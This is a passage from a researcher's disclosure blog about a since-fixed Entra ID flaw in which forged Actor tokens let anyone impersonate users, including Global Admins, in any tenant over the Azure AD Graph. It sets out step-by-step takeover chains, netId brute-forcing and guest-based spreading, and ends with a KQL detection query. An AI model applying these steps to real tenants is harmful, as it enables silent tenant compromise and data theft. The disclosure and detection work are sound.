Microsoft uses these tokens to talk to other services in their backend, something that Microsoft calls service-to-service (S2S) communication. If one of these tokens leaks, it can be used to access all the data in an entire tenant without any useful telemetry or mitigation. In July of this year, Microsoft did publish a blog about removing these insecure legacy practices from their environment, but they do not provide any transparency about how many services still use these tokens.
As I was refining my slide deck and polished up my proof-of-concept code for requesting and generating these tokens, I tested more variants of using these tokens, changing various fields to see if the tokens still worked with the modified information. As one of the tests I changed the tenant ID of the impersonation token to a different tenant in which none of my test accounts existed. The Actor tokens tenant ID was my iminyour.cloud tenant, with tenant ID 6287f28f-4f7f-4322-9651-a8697d8fe1bc and the unsigned JWT generated had the tenant ID b9fb93c1-c0c8-4580-99f3-d1b540cada32.
I sent this token to graph.windows.net using my CLI tool roadtx, expecting a generic access denied since I had a tenant ID mismatch. However, I was instead greeted by a curious error message:
Note that these are the actual screenshots I made during my research, which is why the formatting may not work as well in this blog
The error message suggested that while my token was valid, the identity could not be found in the tenant. Somehow the API seemed to accept my token even with the mismatching tenant. I quickly looked up the netId of a user that did exist in the target tenant, crafted a token and the Azure AD Graph happily returned the data I requested. I tested this in a few more test tenants I had access to, to make sure I was not crazy, but I could indeed access data in other tenants, as long as I knew their tenant ID (which is public information) and the netId of a user in that tenant.
To demonstrate the vulnerability, here I am using a Guest user in the target tenant to query the netId of a Global Admin. Then I impersonate the Global Admin using the same Actor token, and can perform any action in the tenant as that Global Admin over the Azure AD Graph.
First I craft an impersonation token for a Guest user in my victim tenant:
I use this token to query the netId of a Global Admin:
Then I create an impersonation token for this Global Admin (the UPN is kept the same since it is not validated by the API):
And finally this token is used to access the tenant as the Global Admin, listing the users, something the guest user was not able to do:
I can even run roadrecon with this impersonation token, which queries all Azure AD Graph API endpoints to enumerate the available information in the tenant.
None of these actions would generate any logs in the victim tenant.
With this vulnerability it would be possible to compromise any Entra ID tenant. Starting with an Actor token from an attacker controlled tenant, the following steps would lead to full control over the victim tenant:
Find the tenant ID for the victim tenant, this can be done using public APIs based on the domain name.
Find a valid netId of a regular user in the tenant. Methods for this will be discussed below.
Craft an impersonation token with the Actor token from the attacker tenant, using the tenant ID and netId of the user in the victim tenant.
List all Global Admins in the tenant and their netId.
Craft an impersonation token for the Global Admin account.
Perform any read or write action over the Azure AD Graph API.
If an attacker makes any modifications in the tenant in step 6, that would be the only event in this chain that generates any telemetry in the victim tenant. An attacker could for example create new user accounts, grant these Global Admin privileges and then sign in interactively to any Entra ID, Microsoft 365 or third party application that integrates with the victim tenant. Alternatively they could add credentials on existing applications, grant these apps API permissions and use that to exfiltrate emails or files from Microsoft 365, a technique that is popular among threat actors. An attacker could also add credentials to Microsoft Service Principals in the victim tenant, several of which can request Actor tokens that allow impersonation against SharePoint or Exchange. For my DEF CON and Black Hat talks I made a demo video about using these Actor tokens to obtain Global Admin access. The video uses Actor tokens within a tenant, but the same technique could have been applied to any other tenant by abusing this vulnerability.
Since tenant IDs can be resolved when the domain name of a tenant is known, the only identifier that is not immediately available to the attacker is a valid netId for a user in that specific tenant. As I mentioned above, these IDs are added to Entra ID access tokens as the puid claim. Any token found online, in screenshots, examples or logs, even those that are long expired or with an obfuscated signature, would provide an attacker with enough information to breach the tenant. Threat actors that still have old tokens for any tenant from previous breaches can immediately access those tenants again as long as the victim account still exists.
The above is probably not a very common occurrence. What is a more realistic attack is simply brute-forcing the netId. Unlike object IDs, which are randomly generated, netIds are actually incremental. Looking at the differences in netIds between my tenant and those of some tenants I analyzed, I found the difference between a newly created user in my tenant and their newest user to be in the range of 100.000 to 100 million. Simply brute forcing the netId could be accomplished in minutes to hours for any target tenant, and the more user exist in a tenant the easier it is to find a match. Since this does not generate any logs it isn’t a noisy attack either. Because of the possibility to brute force these netIds I would say this vulnerability could have been used to take over any tenant without any prerequisites. There is however a third technique which is even more effective (and more fun from a technical level).
I previously mentioned that a users netId is used to establish links between a user account in multiple tenants. This is something that I researched a few years ago when I gave a talk at Black Hat USA 22 about external identities. The below screenshot is taken from one of my slides, which illustrates this:
The way this works is as follows. Suppose we have tenant A and tenant B. A user in tenant B is invited into tenant A. In the new guest account that is created in tenant A, their netId is stored on the alternativeSecurityIds attribute. That means that an attacker wanting to abuse this bug can simply read that attribute in tenant A, put it in an impersonation token for tenant B and then impersonate the victim in their home tenant. It should be noted that this works against the direction of invite. Any user in any tenant where you accept an invite will be able to read your netId, and with this bug could have impersonated you in your home tenant. In your home tenant you have a full user account, which can enumerate other users. This is not a bug or risk with B2B trusts, but is simply an unintended consequence of the B2B design mechanism. A guest account in someone else’s tenant would also be sufficient with the default Entra ID guest settings because the default settings allow users to query the netId of a user as long as the UPN is known.
To abuse this, a threat actor could perform the following steps, given that they have access to at least one tenant with a guest user:
Query the guest users and their alternativeSecurityIds attribute which gives the netId.
Query the tenant ID of the guest users home tenant based on the domain name in their UPN.
Create an impersonation token, impersonating the victim in their home tenant.
Optionally list Global Admins and impersonate those to compromise the entire tenant.
Repeat step 1 for each tenant that was compromised.
The steps above can be done in 2 API calls per tenant, which do not generate any logs. Most tenants will have guest users from multiple distinct other tenants. This means the number of tenants you compromise with this scales exponentially and the information needed to compromise the majority of all tenants worldwide could have been gathered within minutes using a single Actor token. After at least 1 user is known per victim tenant, the attacker can selectively perform post-compromise actions in these tenants by impersonating Global Admins.
Looking at the list of guest users in the tenants of some of my clients, this technique would be extremely powerful. I also observed that one of the first tenants you will likely compromise is Microsoft’s own tenant, since Microsoft consultants often get invited to customer tenants. Many MSPs and Microsoft Partners will have a guest account in the Microsoft tenant, so from the Microsoft tenant a compromise of most major service provider tenants is one step away.
Needless to say, as much as I would have liked to test this technique in practice to see how fast this would spread out, I only tested the individual steps in my own tenants and did not access any data I’m not authorized to.
While querying data over the Azure AD Graph does not leave any logs, modifying data does (usually) generate audit logs. If modifications are done with Actor tokens, these logs look a bit curious.
Since Actor tokens involve both the app and the user being impersonated, it seems Entra ID gets confused about who actually made the change, and it will log the UPN of the impersonated Global Admin, but the display name of Exchange. Luckily for defenders this creates a nice giveaway when Actor tokens are used in the tenant. After some testing and filtering with some fellow researchers that work on the blue side (thanks to Fabian Bader and Olaf Hartong) we came up with the following detection query:
AuditLogs
| where not(OperationName has “group”)
| where not(OperationName == “Set directory feature on tenant”)
| where InitiatedBy has “user”
| where InitiatedBy.user.displayName has_any ( “Office 365 Exchange Online”, “Skype for Business Online”, “Dataverse”, “Office 365 SharePoint Online”, “Microsoft Dynamics ERP”)
The exclusion for group operations is there because some of these products do actually use Actor tokens to perform operations on your behalf. For example creating specific groups via the Exchange Online PowerShell module will make Exchange use an Actor token on your behalf and create the group in Entra ID.
This blog discussed a critical token validation failure in the Azure AD Graph API. While the vulnerability itself was a bad oversight in the token handling, the whole concept of Actor tokens is a protocol that was designed to behave with all the properties mentioned in the paragraphs above. If it weren’t for the complete lack of security measures in these tokens, I don’t think such a big impact with such limited telemetry would have been possible.
Thanks to the people at MSRC who immediately picked up the vulnerability report, searched for potential variants in other resources, and to the engineers who followed up with fixes for the Azure AD Graph and blocked Actor tokens for the Azure AD Graph API requested with credentials stored on Service Principals, essentially restricting the usage of these Actor tokens to only Microsoft internal services.
July 15, 2025 - reported further details on the impact.
July 15, 2025 - MSRC requested to halt further testing of this vulnerability.
July 17, 2025 - Microsoft pushed a fix for the issue globally into production.
August 6, 2025 - Further mitigations pushed out preventing Actor tokens being issued for the Azure AD Graph with SP credentials.
...
Read the original on dirkjanm.io »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.